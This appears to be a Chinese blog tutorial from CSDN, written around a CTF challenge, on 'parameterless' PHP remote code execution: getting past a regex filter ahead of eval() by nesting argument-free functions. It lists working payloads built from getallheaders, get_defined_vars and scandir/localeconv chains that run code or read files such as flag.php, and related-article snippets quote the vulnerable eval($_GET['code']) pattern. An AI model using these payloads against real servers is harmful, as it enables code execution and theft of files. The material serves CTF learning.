php无参数函数利用

最新推荐文章于 2023-02-19 00:35:44 发布
最新推荐文章于 2023-02-19 00:35:44 发布
阅读量1.8k 收藏 4
点赞数 2
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45785288/article/details/109259595
版权

php无参数函数利用

1.我们先看一道题目

无参数的意思可以是a()、a(b())或a(b(c())),但不能是a(‘b’)或a(‘b’,‘c’),不能带参数
在这里插入图片描述

由 题目中的正则我们可以发现,我们无法写参数进去,只能用 a(b(c())) 这种方式进行rce,这题过滤的是中文 的 ()

所以不要多想。(出题人的小技巧,哈哈)

介绍无参数函数绕过所需要利用的函数

方法1:getenv()

查阅php手册,有非常多的超全局变量

$GLOBALS
$_SERVER
$_GET
$_POST
$_FILES
$_COOKIE
$_SESSION
$_REQUEST
$_ENV

我们可以使用$_ENV,对应函数为getenv()

虽然getenv()可获取当前环境变量,但我们怎么从一个偌大的数组中取出我们指定的值成了问题
这里可以使用方法:

在这里插入图片描述

array_rand()

array_rand() 方法用于从一个数组中随机( 伪随机 )取出一个或者多个单元 , 并返回随机条目的一个或者多个

img

但这样只能获得数组的 , 可以通过 array_flip() 函数获取数组的

array_flip()

该函数用于交换数组中的值和键 , 返回一个 相互交换后的数组

img

getenv() , array_rand() , array_flip() 加上全局变量$_ENV 这三个函数配套使用 , 可以爆破出数组中需要的内容 .

方法2:getallheaders()

getallheaders()

img

end()

img

eval(end(getallheaders()))        //获取http请求头中最后一个参数的值,并执行

同样的有类似的函数

img

接下来开始演示 很奇怪的是 Host 在数组的最后一个位置,好像是倒着来的

在这里插入图片描述

所以 pos() 返回的应该是当前数组的第一个,也就是 phpinfo()

在这里插入图片描述

这样我们就拿到了自定义的 HTTP Header 字段, 并且该字段可以被我们自由使用 , 比如通过 eval() 函数执行 .

getallheders用法小结

添加一个Header为c: phpinfo();,根据位置选择合适的payload:

  1. 添加在Header在第一个:

    payload: code=eval(pos(getallheaders()));

    (pos()可以换为current(). 如果在第二个可以使用next())

  2. 添加在Header在最后一个:

    payload: code=eval(end(getallheaders()));

  3. 不知道位置:

    配合array_rand(), array_flip()构造payload进行爆破:

    payload: eval(array_rand(array_flip(getallheaders())));

方法3:localeconv()

scandir()

img

scandir('.')能够返回当前目录的文件列表的数组,那么怎么取出文件名和读取文件呢,可以使用end()readfile()

但是还需要构造函数scandir('.')中的参数.,这里有一个localeconv()函数:

img

其中数组的第一个元素就是., 所以用 pos 或者 current

但是我们不知道 flag.php的位置所以我们还需要利用我们最开始讲的两个函数

?c=readfile(array_rand(array_flip(scandir(current(localeconv())))));

方法4:get_defined_vars()

get_defined_vars() 函数返回由所有已定义变量所组成的数组。

和getallheaders()利用类似,但是不止apache, ngnix和其他的也可以用

函数返回的内容:

array(4) {
  ["_GET"]=>
  array(0) {
  }
  ["_POST"]=>
  array(1) {
    ["code"]=>
    string(29) "var_dump(get_defined_vars());"
  }
  ["_COOKIE"]=>
  array(0) {
  }
  ["_FILES"]=>
  array(0) {
  }
}
利用$_GET

url:http://127.0.0.1/ctf/boringcode/rce.php?test=phpinfo();

post:code=eval(end(current(get_defined_vars())));

img

方法5:直接遍历目录

可以尝试直接读取本地文件 , 其中最大的问题就是如何切换目录来遍历目录 .

  1. getcwd() : 获取当前工作目录

    在这里插入图片描述

  2. scandir() : 查看当前目录下的内容

    在这里插入图片描述

  3. dirname() : 跳转上级目录

    img

  4. readfile() : 读取文件

    [img

当然 , 使用该方法读取文件的局限性很大 , 比如只能从当前目录递归遍历到根目录 , 而无法读取其他的目录的内容 . 基本上用处不太大~

常用playpoad

读文件:
readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv())))))))))))

最后:所有利用到的函数总结

getcwd() 函数返回当前工作目录。
scandir() 函数返回指定目录中的文件和目录的数组。
dirname() 函数返回路径中的目录部分。
chdir() 函数改变当前的目录。

readfile()  输出一个文件 

current()       返回数组中的当前单元, 默认取第一个值
pos()           current() 的别名
next() 函数将内部指针指向数组中的下一个元素,并输出。
end()       将内部指针指向数组中的最后一个元素,并输出。
array_rand()    函数返回数组中的随机键名,或者如果您规定函数返回不只一个键名,则返回包含随机键名的数组。
array_flip()    array_flip() 函数用于反转/交换数组中所有的键名以及它们关联的键值。

chr() 函数从指定的 ASCII 值返回字符。
hex2bin — 转换十六进制字符串为二进制字符串

getenv()        获取一个环境变量的值(在7.1之后可以不给予参数)

other: array_flip可以替换为array_reverse

readfile可以替换为show_source 和 highlight_flie

林一不是01
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1859
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
PHP实现动态获取函数参数的方法示例
12-19
PHP编程中,有时我们需要创建可以接受任意数量参数函数,这种情况下,我们可以利用PHP的内置函数来动态地获取和处理这些参数。本篇文章将详细解释如何使用`func_num_args()`,`func_get_arg()`,以及`func_get_...
web中的post、get传参
D-R0s1的博客
10-08 2924
  CTF比赛中web题型里经常会见到post和get传参的题型,原理也很简单,在get传参的时候,要构造URL拿一道BugKu中的题来举个例子 很明显,只需要构造what=get,回车,即可得到答案。 在post传参的时候,也是看一下代码要求,例如:   显然,只需要构造what=flag即可得到flag。但是这个地方要用到火狐浏览器中的一个插件——hackbar,新版火狐中没有hackba...
PHP无参函数
Flynn的博客
04-18 652
eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); }
PHP参数RCE
weixin_43610673的博客
03-14 2824
参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
php参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 508
前言最近做了一些 php参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
php参数函数实现rce,无参数读文件和RCE总结
weixin_28759987的博客
04-02 744
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
php定义参数数量可变的函数用法实例
10-24
这种定义可变参数函数的方法适用于那些需要处理可变输入的情况,例如,当你想让用户能够自由地传递任意数量的值来执行某种操作,或者在某些情况下需要动态地处理输入数据。 除了`func_get_args()`之外,PHP还提供了...
php 函数使用可变数量的参数方法
10-19
PHP 中,函数可以接受可变数量的参数,这意味着在定义函数时,你不必预先知道函数会被传入多少个参数。这为编写灵活的代码提供了便利。下面将详细介绍如何在不同 PHP 版本中实现这一功能。 在 PHP 5.5 及更早的...
PHP.rar_PHP 函数
09-22
本文将深入探讨PHP函数的基本概念、类型以及如何在实际开发中有效利用它们。 ### 1. PHP函数基本概念 函数是可重复使用的代码块,用于执行特定任务。在PHP中,你可以定义自己的函数,也可以使用内置的函数PHP的...
php函数参数可有可无(可以不传递参数)
01-08
前言 正常情况下,函数一旦声明参数,调用时就必须传入,否则会报错: function demo($e){ return $e; } echo demo(); // Uncaught ArgumentCountError: Too few arguments to function xxxx() 那么如何实现 想传参就传,不想传就不传呢? 实现 很简单,只需要 将形参指定默认值为空即可,下面给出一个演示: function demo($e = ''){ return $e; } echo demo();// echo demo('hello, world!');//hello,
php内嵌函数用法实例
12-18
此外,PHP还提供了一些与函数相关的内置函数,如`func_get_args()`,它返回一个包含函数参数列表的数组;`func_num_args()`返回传递给函数参数个数;`func_get_arg()`则返回指定位置的参数值。这些函数常用于实现...
php无参rce,php中无参函数的RCE
weixin_30920907的博客
03-17 300
学习一下php中无符号的问题。1.无参数}else{show_source(__FILE__);}?>这里调用函数只能是code(a()) 也就是括号中不能含有参数。http-header传参在session_id中设置我们想要输入的RCE,达到传参的目的,但是第一点需要session_start()开启session会话。payload:code=eval(hex2bin(session_...
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1185
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
BUUCTF-web-[RoarCTF 2019]Easy Calc
weixin_44866139的博客
05-15 614
有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num'];
参数RCE
m0_62422842的博客
05-11 1507
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
无参函数的RCE
silence1_的博客
10-31 2384
无参函数的RCE 最近遇到挺多rce的题,这里记录一下关于无参函数的rce。 先看看代码: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } ?> 很明了,...
PHP中无参数方法的用法
CodingHouses的专栏
04-12 456
    //使用function关键字定义方法  function num(){   echo "Hello";  }   //调用该方法  num(); ?>
php函数,不少于11个字
最新发布
03-30
PHP是一种广泛使用的服务器端脚本语言,其强大的功能和灵活性主要归功于其丰富的函数库。本文将深入探讨PHP函数的各个方面...此外,利用php手册深入了解和发掘内置函数的强大功能,是成为一个优秀PHP开发者的重要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值